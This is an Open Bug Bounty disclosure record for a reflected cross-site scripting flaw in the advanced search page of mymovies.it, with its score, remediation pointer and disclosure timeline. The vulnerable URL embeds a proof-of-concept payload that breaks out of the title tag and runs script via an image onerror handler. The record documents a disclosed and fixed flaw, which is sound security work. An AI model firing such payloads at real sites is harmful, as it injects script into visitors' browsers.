mymovies.it XSS vulnerability

2017-10-17T14:14:00
ID OBB:340987
Type openbugbounty
Reporter Xaliom
Modified 2018-02-19T01:27:00

Description

Open Bug Bounty ID: OBB-340987

Description| Value
---|---
Affected Website:| mymovies.it
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.mymovies.it/database/ricerca/avanzata/?titolo=%3C/title%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3E&titolo;_orig=&regista;=&attore;=&id;_genere=-1&nazione;=&clausola1;=-1&anno;_prod=&clausola2;=-1&stelle;=-1&id;_manif=-1&anno;_manif=&disponib;=-1&ordinamento;=0&submit;=Inizia+ricerca+%C2%BB
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 17 October, 2017 14:14 GMT
Vulnerability Verified:| 17 October, 2017 14:17 GMT
Website Operator Notified:| 17 October, 2017 14:17 GMT
Vulnerability Published:| 17 October, 2017 14:17 GMT[without any technical details]
Vulnerability Fixed:| 19 February, 2018 01:27 GMT
Public Disclosure:| 19 February, 2018 01:27 GMT